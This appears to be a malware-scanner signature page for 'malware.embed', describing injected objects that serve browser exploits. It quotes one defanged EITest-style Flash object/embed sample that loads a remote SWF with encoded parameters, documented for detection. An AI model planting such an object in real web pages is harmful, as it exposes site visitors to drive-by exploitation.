SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware.embed

malware.embed

Description:
Malicious embedded objects detected on the page. The objects may serve Flash, Java or other types of browser exploits.

Here's a sample of one such a malicious object

<object classid="clsid:​d27cdb6e-ae6d-11cf-96b8-444553540000" id="​EITest" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="40" height="40" align="middle" >
<param name="allowScriptAccess" value="always"/>
<param name="movie" value="hxxp://amegylek[.]us.to/player.php?pid=4E42AAB285B3331C7DB60BBC34847B2909B745E4EFE3786D0C2C4CC901B76FF5C988"/>
<param name="quality" value="high"/>
<param name="FlashVars" value="css=2&id=​cogi%7Bngm0wu0vq1xkfgq0rjrAkf%3F6G64CCD4%3A7D5553E9FD82DDE56%3A69D4%3B2%3BD967G6GHG59%3A8F2E4E6EE%3B23D98HH7E%3B%3A%3A" />
<param name="bgcolor" value="#ffffff"/>
<param name="wmode" value="opaque"/>
<embed src="hxxp://amegylek[.]us.to/player​.php?pid=4E42AAB285B3331C7DB60BBC34847B2909B745E4EFE3786D0C2C4CC901B76FF5C988" quality="high" bgcolor="#ffffff"  name="​EITest"  FlashVars="css=2&id=​cogi%7Bngm0wu0vq1xkfgq0rjrAkf%3F6G64CCD4%3A7D5553E9FD82DDE56%3A69D4%3B2%3BD967G6GHG59%3A8F2E4E6EE%3B23D98HH7E%3B%3A%3A" width="40" height="40" align="middle" allowScriptAccess="always" play="true" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" wmode="opaque"/>
</object>

Affecting: Any web site (no specific target).